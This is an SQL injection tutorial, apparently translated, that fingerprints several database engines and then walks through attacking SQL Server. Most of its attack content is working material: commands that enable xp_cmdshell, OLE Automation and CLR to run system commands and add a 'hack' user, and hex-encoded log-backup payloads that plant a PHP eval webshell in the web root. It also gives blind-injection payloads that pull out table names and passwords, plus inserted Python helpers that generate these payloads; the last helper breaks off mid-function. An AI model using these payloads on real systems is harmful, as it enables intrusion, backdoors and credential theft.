SQL injection on MySQL, SQL Server, Oracle, Access and PostgreSQL in detail


Determining the database type

Once testing shows that SQL injection exists, the first thing to do is work out which database engine is behind it.

The common engines are MySQL, Access, SQL Server, Oracle and PostgreSQL. Most SQL is similar across them, but each has its own system tables, and those tables let us tell them apart.

MySQL exposes information_schema.tables, Access has msysobjects, SQL Server has sysobjects and Oracle has dual. A query that references one of these objects only succeeds on an engine that has it, so whichever probe leaves the page rendering normally identifies the database. Two caveats: information_schema also exists on SQL Server and PostgreSQL, and MySQL accepts FROM dual as well, so test the engine-specific objects (sysobjects, msysobjects) first and treat a hit on information_schema or dual alone as inconclusive.

 

Alternatively, query the version: @@version on MySQL and SQL Server, v$version on Oracle, version() on PostgreSQL and MySQL.
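As an added example (not code from the original page), the following Python shows the probe order a practitioner would use against a boolean oracle, including the PostgreSQL case the page mentions but gives no probe for. The oracle here is a constructed stand-in: it answers from a hypothetical set of catalog objects per engine so the script runs offline. Against a real target the oracle would send the payload and compare the response with the baseline page. The Oracle probe uses v$version rather than the page's dual because MySQL also accepts FROM dual.

```python
import re

# Probe predicates, in the order they should be tried. Each succeeds only on an
# engine where the referenced object exists. Engine-specific objects go first:
# information_schema also exists on SQL Server and PostgreSQL, and MySQL accepts
# FROM dual, so those are only conclusive once the others have failed.
PROBES = [
    ("mssql",      "and (select count(*) from sysobjects)>0"),
    ("access",     "and (select count(*) from msysobjects)>0"),
    ("oracle",     "and (select count(*) from v$version)>0"),
    ("postgresql", "and (select count(*) from pg_tables)>0"),
    ("mysql",      "and (select count(*) from information_schema.tables)>0"),
]

# Constructed stand-in for the five engines: which probe objects each has.
# (MySQL has information_schema and dual; PostgreSQL has information_schema
# and pg_tables; SQL Server has sysobjects and information_schema.)
FAKE_CATALOGS = {
    "mysql":      {"information_schema.tables", "dual"},
    "postgresql": {"information_schema.tables", "pg_tables"},
    "mssql":      {"sysobjects", "information_schema.tables"},
    "oracle":     {"dual", "v$version"},
    "access":     {"msysobjects"},
}


def make_oracle(engine: str):
    """Boolean oracle for a hypothetical target running `engine`.
    True means 'page rendered normally': the injected predicate was valid and
    true. A reference to a missing object is a SQL error, hence False."""
    objects = FAKE_CATALOGS[engine]

    def oracle(payload: str) -> bool:
        table = re.search(r"from ([\w.$]+)\)", payload).group(1)
        return table in objects

    return oracle


def fingerprint(oracle) -> str:
    """Send the probes in order; the first one the page accepts names the engine."""
    for engine, payload in PROBES:
        if oracle(payload):
            return engine
    return "unknown"


if __name__ == "__main__":
    for engine in FAKE_CATALOGS:
        print(f"{engine:11s} -> {fingerprint(make_oracle(engine))}")
```

The order of PROBES is the point: reversing it would classify SQL Server and PostgreSQL as MySQL.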

MySQL injection

MySQL is the most familiar engine, so it is not covered here.

For detailed injection and bypass techniques see https://xz.aliyun.com/t/7169, which is well written.

SQL Server injection

Determining the current user's privileges

Three privilege levels matter in practice:

  1. sa (sysadmin): database operations, file management, command execution, registry access and so on. The highest privilege in SQL Server, roughly equivalent to SYSTEM on the host.
  2. db_owner: file management and database operations, roughly comparable to users/administrators.
  3. public: database operations only, roughly comparable to guest/users.

Check for sysadmin (sa):

select is_srvrolemember('sysadmin')

Check for db_owner:

select is_member('db_owner')

Check for public:

select is_srvrolemember('public')

Each returns 1 for a member and 0 otherwise. Note that every login is a member of the public server role, so the last check returns 1 for any valid login; it confirms only that the query ran, not that the user is limited to public.

A SQL Server instance commonly shows six databases by default: the four system databases master, model, msdb and tempdb, plus the two Reporting Services databases ReportServer and ReportServerTempDB (present only when Reporting Services is installed). Of the system databases, model and tempdb contain no user tables by default.

  1. master: controls every aspect of SQL Server. It holds all configuration information, login information and information about the processes currently running on the server.
  2. model: the template for every new user database. When you create a database, SQL Server copies every object in model into the new database; after the template objects are copied, the remaining space in the new database is filled with empty pages.
  3. msdb: a special case. If you look at its actual definition it is a user database; what sets it apart is what SQL Server uses it for. All job scheduling, alerts and operators are stored in msdb, as is the backup history. SQL Server Agent relies on this database.
  4. tempdb: a very special database available to every user connecting to the server. It holds all temporary tables, temporary stored procedures and other scratch objects SQL Server creates, for example the intermediate data used when sorting: the data goes into tempdb, is sorted, and the result is returned to the user. tempdb is emptied and rebuilt every time SQL Server restarts, so never create anything there that must persist.

Connecting remotely with Navicat, however, only the two instance databases ReportServer and ReportServerTempDB are listed.

Useful SQL Server queries

#Common statements

select @@version;       #database version

select @@servername;    #server (instance) name

select host_name();     #name of the client workstation, not the server; over a remote Navicat connection this is your own machine's name

select db_name();       #current database name

select db_name(1);      #name of the database with dbid 1

select db_name(2);      #name of the database with dbid 2

select user;            #current database user name. When the login maps to the database owner this returns dbo (database owner), the default user that holds owner privileges in every database

use tempdb              #switch to tempdb

top n                   #first n rows (select top n * from ...)

#SQL Server has no LIMIT clause; MySQL's limit 2,3 (three rows starting at the third) is written ORDER BY ... OFFSET 2 ROWS FETCH NEXT 3 ROWS ONLY on SQL Server 2012 and later

select substring('string',2,1)     #one character starting at 1-based position 2, i.e. 't'

select ascii('a')                  #ASCII value of the first character of the string

select len('string')               #length of the string

EXEC sp_spaceused @updateusage = N'TRUE';  #size of the current database

sp_spaceused 'table_name'          #size of the named table

 

#Connection strings

server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB

mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB

 

#Enumerating databases

count(name) returns how many there are

name returns the names

* returns every column

 

select count(name) from sysdatabases     #number of databases; write master..sysdatabases to make it work regardless of the current database

select name  from sysdatabases           #database names

select * from sysdatabases               #all details of every database

 

#Enumerating tables

select count(name) from sysobjects where type='U' #number of user tables in the current database

select name from sysobjects where type='U'  #names of all user tables in the current database

select * from sysobjects where type='U'    #details of all user tables in the current database

 

select count(name) from test..sysobjects where xtype='U'  #number of user tables in the test database

select name from test..sysobjects where xtype='U'         #names of the user tables in test

select * from test..sysobjects where xtype='U'            #details of the user tables in test

 

#Enumerating columns

The object id must be looked up in the same database whose syscolumns is queried, so the first three statements only give correct results when the current database is test; the three after them name the database explicitly and work from anywhere.

select count(name) from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')            #number of columns in the users table

select name from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')         #names of the columns of users

select * from syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')      #details of the columns of users

 

select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')     #number of columns in test's users table

select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #names of the columns of test's users table

select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #details of the columns of test's users table

 

#Reading data

select count(*) from test..users          #number of rows in test's users table

select * from test..users                 #all rows of test's users table

 

Using sa privileges to enable xp_cmdshell and get a shell on the host

Checking the xp_cmdshell status

The state of xp_cmdshell can be looked up in master.dbo.sysobjects.

Only existence matters, so count(*) is enough:

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

xtype is the object type; xtype='x' means xp_cmdshell is registered as an extended stored procedure.

Returns 1 if it exists. This only shows that the procedure is registered; whether it may be called is governed by the xp_cmdshell configuration option enabled below.

Enabling xp_cmdshell

If xp_cmdshell is not enabled, enable it with sp_configure:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

The same can be done through execute():

execute('sp_configure "show advanced options",1')  #set the option to 1

execute('reconfigure')                             #apply the setting

execute('sp_configure "xp_cmdshell", 1')           #set xp_cmdshell to 1

execute('reconfigure')                             #apply the setting

Running commands with xp_cmdshell

System commands are run as follows (the master.. prefix is optional):

exec master..xp_cmdshell 'whoami'

Writing files with xp_cmdshell

First use dir to find the web root:

exec master..xp_cmdshell 'dir'

Then write a one-line webshell into a file with echo and connect to it:

exec xp_cmdshell 'echo test>d:\1.txt'

Restoring a deleted xp_cmdshell

If xp_cmdshell has been dropped, it can be re-registered from xplog70.dll (normally found in the instance's Binn directory):

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'

Using sa privileges to run commands via sp_oacreate

Prerequisite for this technique:

the SQL Server service must not be running under a reduced-privilege account (it needs to instantiate COM objects)

The OLE Automation procedures (sp_OACreate and friends) can drive a COM object such as WScript.Shell to run a command. Test whether they are usable with:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

If SQL Server reports that access to procedure 'sys.sp_OACreate' of component 'Ole Automation Procedures' is blocked, enable the component:

EXEC sp_configure 'show advanced options', 1; 

RECONFIGURE WITH OVERRIDE; 

EXEC sp_configure 'Ole Automation Procedures', 1; 

RECONFIGURE WITH OVERRIDE; 

Re-running the test no longer errors, so commands can now be executed, but sp_oacreate returns no command output:


Instead, have the command leave a side effect, for example creating a user named hack:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user hack Password@ /add'

Using sa privileges to run commands via CLR

#Enable CLR integration

exec sp_configure 'show advanced options', 1;

RECONFIGURE;

Exec sp_configure 'clr enabled', 1;

RECONFIGURE;

#To load an UNSAFE assembly the database must be marked TRUSTWORTHY. On SQL Server 2017 and later, where 'clr strict security' is on by default, the assembly must additionally be signed or registered with sp_add_trusted_assembly.

ALTER DATABASE [master] SET TRUSTWORTHY ON;

#Load the assembly (run on its own; the 0x... value is the hex dump of the DLL, omitted here)

CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x... WITH PERMISSION_SET = UNSAFE;

#Create the stored procedure (run on its own)

CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

#Run a command

EXEC sp_cmdExec 'whoami';

#Remove the procedure and the assembly

DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];

Getting a shell with db_owner privileges via log backup

Both the log-backup and the differential-backup technique write a one-line webshell into a file as a side effect of the backup.

Common SQL Server backup schedules:

  1. one full backup per week
  2. one differential backup per day
  3. one transaction log backup per hour

Prerequisites:

  1. the target database already has a full backup (a log backup needs one in its chain), so to use the test database, test must have been backed up before
  2. the absolute path of the web root is known
  3. the injection point supports stacked queries

Procedure (dbname stands for the target database):

alter database dbname set RECOVERY FULL;   #switch to the FULL recovery model; log backups are not possible under SIMPLE

create table cmd (a image);        #create a table cmd with a single column a of type image

backup log dbname to disk= 'C:\phpstudy\WWW\1.php' with init;   #take a log backup to the given path; with init overwrites the file so the next backup starts from a clean log

insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  #insert the webshell into cmd; the bytes are now in the transaction log

backup log dbname to disk='C:\phpstudy\WWW\2.php';   #back up the log, webshell bytes included, into the target file

drop table cmd;    #drop cmd

The 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e on the fourth line is the hex encoding of the one-line webshell <?php @eval($_POST[x]);?>

This produces 1.php and 2.php in the web root: 1.php holds the first log backup, and 2.php is the file to connect to with a webshell client. Both are binary backup files; the PHP tag sits somewhere inside 2.php and PHP ignores the bytes around it.

Getting a shell with db_owner privileges via differential backup

Note: this variant has a chance of breaking the website, so it is not the preferred method.

Prerequisites:

  1. the absolute path of the web root is known, here C:\phpstudy\WWW
  2. the injection point supports stacked queries

Note: run the following statements one at a time

create table [dbo].[test] ([cmd] [image])

 

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate

 

insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)

 

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate

 

Drop table [test]

  1. 0x786965 on the second line is the hex encoding of the characters xie; any value works, it is only a throwaway file name for the first backup
  2. 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e on the third line is the hex encoding of the one-line webshell <?php @eval($_POST[x]);?>
  3. 0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 on the fourth line is C:\phpstudy\WWW\shell.php encoded as UTF-16LE, which is how SQL Server reads a binary constant assigned to an nvarchar variable

Note that, despite the heading, the statements as given are log backups (backup log ... with init,no_truncate) rather than backup database ... with differential; what distinguishes this variant from the previous one is that strings are carried as hex literals so the payload needs no quotes.

 

The webshell shell.php then appears in the web root.
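Producing the hex literals by hand is where these payloads usually go wrong, so here is an added Python example (not code from the original page) that encodes the two kinds of literal the technique needs and assembles the statement sequence above. The webshell and the target path are the page's; the scratch file name is encoded as a proper UTF-16LE literal rather than the page's three raw bytes, which SQL Server would otherwise have to pad when converting to nvarchar.

```python
# Hex literals for the backup-to-webshell technique (SQL Server).

WEBSHELL = "<?php @eval($_POST[x]);?>"        # the page's one-line webshell
WEB_ROOT_FILE = r"C:\phpstudy\WWW\shell.php"  # the page's target path


def varbinary_literal(s: str) -> str:
    """0x... literal whose bytes are the string's ASCII bytes. Used for the value
    inserted into the image column: it lands in the log exactly as written."""
    return "0x" + s.encode("ascii").hex()


def nvarchar_literal(s: str) -> str:
    """0x... literal that yields the string when SQL Server converts it to
    nvarchar (it interprets the bytes as UTF-16LE). Used for the backup path
    assigned to the nvarchar(4000) variable, so no quote appears in the payload."""
    return "0x" + s.encode("utf-16-le").hex()


def decode_nvarchar_literal(lit: str) -> str:
    """Inverse of nvarchar_literal, to check a literal before sending it."""
    return bytes.fromhex(lit[2:]).decode("utf-16-le")


def backup_payloads(shell_path: str, webshell: str = WEBSHELL, scratch: str = "xie") -> list:
    """The page's statement sequence with every string carried as a hex literal.
    Each element is sent as its own stacked query, in order."""
    return [
        "create table [dbo].[test] ([cmd] [image])",
        "declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s="
        + nvarchar_literal(scratch)
        + " backup log @a to disk = @s with init,no_truncate",
        "insert into [test](cmd) values(" + varbinary_literal(webshell) + ")",
        "declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s="
        + nvarchar_literal(shell_path)
        + " backup log @a to disk=@s with init,no_truncate",
        "Drop table [test]",
    ]


if __name__ == "__main__":
    for stmt in backup_payloads(WEB_ROOT_FILE):
        print(stmt)
```

The generated sequence contains no single quote at all, which is why the hex form survives filters that the quoted version of the previous section would not.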

Blind injection against SQL Server

Determining the current user's privileges

and 1=(IS_SRVROLEMEMBER('sysadmin'))        //page normal: sysadmin (sa)

and 1=(IS_MEMBER('db_owner'))               //page normal: db_owner

and 1=(IS_srvrolemember('public'))          //page normal: at least public, the lowest level

A sysadmin user renders the normal page for all three. A db_owner user fails the sysadmin check and passes the public one. A public-only user passes only the public check. Since every login belongs to public, the third check is in effect a sanity check that the injected predicate runs at all.

Checking whether xp_cmdshell exists

and 1=(Select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 

Page normal: the procedure is registered. If it is not, it must be re-registered first.

Even when it is available, running system commands through xp_cmdshell from an injection point requires stacked queries.

Number of databases

and (select count(name) from master..sysdatabases)=N

In this example the page rendered normally for N=7, so there are 7 databases.

Counting dbids: normally the dbids run from 1 up to the number of databases

and (select count(*) from master..sysdatabases where dbid=N)=1

Getting every database name via dbid

If the previous statement cannot be used, the following still gives the number of databases and the name of each.

Length of the name of the database with dbid 1:

and len(db_name(1))>5         //page normal

and len(db_name(1))>6         //page abnormal

 

Greater than 5 is normal and greater than 6 is not, so the first database name is 6 characters long (master).

Usually the first six dbids are the six built-in databases and user databases start at dbid 7.

 

and len(db_name(7))>3         //page normal

and len(db_name(7))>4         //page abnormal

Greater than 3 is normal and greater than 4 is not, so the seventh database name is 4 characters long.

 

ASCII values of the characters of the database with dbid 7

and ascii(substring(db_name(7),1,1))>100   //page normal

and ascii(substring(db_name(7),1,1))>150   //page abnormal

and ascii(substring(db_name(7),1,1))>125   //page abnormal

and ascii(substring(db_name(7),1,1))>112   //page normal

and ascii(substring(db_name(7),1,1))>118   //page abnormal

and ascii(substring(db_name(7),1,1))>115   //page normal

and ascii(substring(db_name(7),1,1))>116   //page abnormal

 

Greater than 115 is normal and greater than 116 is not, so the first character of the seventh database name has ASCII value 116, which is t.

 

Repeat for the second character:  and ascii(substring(db_name(7),2,1))>100

         the third character: and ascii(substring(db_name(7),3,1))>100

         the fourth character: and ascii(substring(db_name(7),4,1))>100

The seventh database name comes out as test.

Current database name

Length of the current database name:

and len(db_name())>3         //page normal

and len(db_name())>4         //page abnormal

 

Greater than 3 is normal and greater than 4 is not, so the name is 4 characters long.

 

ASCII values of the characters, by bisection

and ascii(substring(db_name(),1,1))>100   //page normal

and ascii(substring(db_name(),1,1))>150   //page abnormal

and ascii(substring(db_name(),1,1))>125   //page abnormal

and ascii(substring(db_name(),1,1))>112   //page normal

and ascii(substring(db_name(),1,1))>118   //page abnormal

and ascii(substring(db_name(),1,1))>115   //page normal

and ascii(substring(db_name(),1,1))>116   //page abnormal

 

Greater than 115 is normal and greater than 116 is not, so the first character has ASCII value 116, which is t.

 

Repeat for the second character:  and ascii(substring(db_name(),2,1))>100

         the third character: and ascii(substring(db_name(),3,1))>100

         the fourth character: and ascii(substring(db_name(),4,1))>100

        

The current database name comes out as test.

Number of tables in test

and (select count(name) from test..sysobjects where xtype='U')>0   page normal

and (select count(name) from test..sysobjects where xtype='U')>1   page abnormal

So test contains exactly one table.

Table names in test

The payloads below (in sqlmap's style) extract one character at a time without first querying the name length. When a position is reached where even >0 renders abnormally, that position does not exist and the name ended at the previous one. Note that the name extracted this way carries the schema prefix dbo. (Wrapping the same subquery in len() would give the length up front and save requests.)

Character code of the first character of the first table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

Character code of the second character of the first table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

Character code of the third character of the first table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 0 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

......

At the tenth character, >0 renders abnormally, so there is no tenth character.

Extracted table name: dbo.users

 

If there is a second table, a third table, and so on:

 

Character code of the first character of the second table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

Character code of the second character of the second table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

Character code of the third character of the second table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 1 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

......

 

Character code of the first character of the third table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),1,1))>N

Character code of the second character of the third table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),2,1))>N

Character code of the third character of the third table name:

AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

Number of columns in the users table in test

and (select count(name) from test..syscolumns where id=(select id from test..sysobjects where name='users'))=3  #page normal

So users has 3 columns.

Column names of the users table in test

The payloads below use col_name(object_id('users'),n). object_id('users') is resolved in the current database, so they assume the connection's current database is test; otherwise use object_id('test..users').

Length of the first column name of users

and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>1  page normal

and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>2  page abnormal

So the first column name is 2 characters long.

 

ASCII value of the first character of the first column name, by bisection:

and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),1,1))>N

ASCII value of the second character of the first column name:

and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),2,1))>N

........

The first column name comes out as id.

 

Length of the second column name

and len((select top 1 col_name(object_id('users'),2) from test..sysobjects))>N

 

ASCII value of the first character of the second column name:

and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),1,1))>N

ASCII value of the second character of the second column name:

and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),2,1))>N

ASCII value of the third character of the second column name:

and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),3,1))>N

 

Length of the third column name

and len((select top 1 col_name(object_id('users'),3) from test..sysobjects))>N

........

Assume the three column names come out as id, username and password.

Number of rows in the users table in test

and (select count(*) from test..users)=N

In this example the page rendered normally for N=4, so there are four rows.

Extracting the password column of users in test

These payloads extract one character at a time without first querying the value's length. When a position is reached where even >0 renders abnormally, that position does not exist and the value ended at the previous one.

 

Character code of the first character of the first row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),1,1))>N

Character code of the second character of the first row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),2,1))>N

Character code of the third character of the first row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),3,1))>N

Character code of the fourth character of the first row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),4,1))>N

At the fifth character, >0 renders abnormally, so the first value is 4 characters long.

The first row of the password column comes out as root.

 

Character code of the first character of the second row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),1,1))>N

Character code of the second character of the second row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),2,1))>N

Character code of the third character of the second row of password:

and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),3,1))>N

........
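The walkthroughs above for the database name, the table names and the password column all run the same loop by hand: ask whether the character at a position is greater than a threshold, then halve the interval. The following Python, an added example rather than code from the original page, automates that loop against a boolean oracle. The oracle here is constructed: it parses the position and threshold out of the payload and answers from a hard-coded secret, so the script runs offline; against a real target it would send the payload and compare the response with the baseline page. The template table goes beyond the SQL Server case to the equivalent Oracle and Access predicates from the later sections. A time-based oracle (WAITFOR DELAY, dbms_pipe.receive_message) plugs in the same way, returning True when the response was slow.

```python
import re
from typing import Optional

# Constructed secret standing in for what the DBMS would return for the
# extracted expression (db_name() on the page's target).
SECRET = "test"

# Payload templates: {pos} is the 1-based character position, {n} the threshold.
# The first is the page's SQL Server form; the others are the equivalent
# predicates from the Oracle and Access sections, so one loop serves all.
TEMPLATES = {
    "mssql":  "and ascii(substring(db_name(),{pos},1))>{n}",
    "oracle": "and (select ascii(substr(user,{pos},1)) from dual)>{n}",
    "access": "and (select top 1 asc(mid(admin,{pos},1)) from admin)>{n}",
}

_PROBE = re.compile(r",(\d+),1\)\)(?: from \w+\))?>(\d+)$")


def simulated_oracle(payload: str) -> bool:
    """Stand-in for the web application: True means the page rendered normally.
    Parses pos and threshold from the payload and evaluates the predicate
    against SECRET the way the DBMS would."""
    m = _PROBE.search(payload)
    pos, n = int(m.group(1)), int(m.group(2))
    if pos > len(SECRET):
        # Past the end: substring yields '' and ascii('') is NULL, so the
        # comparison is never true and the page never renders normally.
        return False
    return ord(SECRET[pos - 1]) > n


def binary_search_char(oracle, template: str, pos: int, lo: int = 0, hi: int = 127) -> Optional[int]:
    """Code of the character at pos, or None if pos is past the end.
    Invariant: char > lo is true and char > hi is false, so the answer lies in
    (lo, hi]; when hi - lo == 1 the answer is hi."""
    if not oracle(template.format(pos=pos, n=lo)):
        # Even > 0 fails: there is no character at this position. This is the
        # end-of-string signal the page relies on when len() is not used.
        return None
    while hi - lo > 1:
        mid = (lo + hi) // 2
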